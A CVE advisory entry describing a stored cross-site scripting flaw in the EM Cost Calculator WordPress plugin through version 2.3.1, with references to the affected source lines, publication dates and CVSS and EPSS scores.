CVE-2026-2506

medium

Description

The EM Cost Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.3.1. This is due to the plugin storing attacker-controlled 'customer_name' data and rendering it in the admin customer list without output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute when an administrator views the EMCC Customers page.

References

https://www.wordfence.com/threat-intel/vulnerabilities/id/1eef338a-ccc7-41a2-b87a-0945e39380d2?source=cve

https://plugins.trac.wordpress.org/browser/cost-calculator/tags/2.3.1/em-cost-calculator-widget.php#L701

https://plugins.trac.wordpress.org/browser/cost-calculator/tags/2.3.1/em-cost-calculator-widget.php#L682

https://plugins.trac.wordpress.org/browser/cost-calculator/tags/2.3.1/em-cost-calculator-widget.php#L655

https://plugins.trac.wordpress.org/browser/cost-calculator/tags/2.3.1/em-cost-calc-admin-page.php#L59

Details

Source: Mitre, NVD

Published: 2026-02-26

Updated: 2026-04-15

Risk Information

CVSS v2

Base Score: 6.4

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N

Severity: Medium

CVSS v3

Base Score: 6.1

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Severity: Medium

EPSS

EPSS: 0.0007